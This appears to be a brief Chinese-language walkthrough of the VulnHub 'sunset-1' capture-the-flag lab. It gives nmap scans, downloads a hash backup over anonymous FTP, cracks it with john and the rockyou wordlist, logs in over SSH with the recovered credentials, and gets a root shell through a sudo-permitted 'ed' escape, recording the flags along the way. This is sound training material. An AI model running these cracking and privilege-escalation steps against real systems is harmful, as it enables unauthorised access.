貓寧~~~
地址:http://www.vulnhub.com/entry/sunset-1,339/
重點關注工具使用和測試思路
nmap 192.168.43.0/24
靶機IP
192.168.43.73
nmap -A -p1-65535 192.168.43.73
21/tcp open ftp
22/tcp open ssh
存在匿名查看的文件
ftp://192.168.43.73/backup
解壓rockyou.txt字典
tar -zxvf /usr/share/wordlists/rockyou.txt.gz
wget ftp://192.168.43.73/backup
識別加密類型
john backup --wordlist=/usr/share/wordlists/rockyou.txt
破解
john --format=sha512crypt backup --wordlist=/usr/share/wordlists/rockyou.txt
得到賬號密碼sunset/cheer14
ssh連接成功
ssh [email protected]
家目錄下發現user.txt,內容5b5b8e9b01ef27a1cc0a2d5fa87d7190
sudo -l,發現(root) NOPASSWD: /usr/bin/ed
sudo /usr/bin/ed,輸入!/bin/sh,進入root權限
cd ~,cat flag.txt,得到25d7ce0ee3cbf71efbac61f85d0c14fe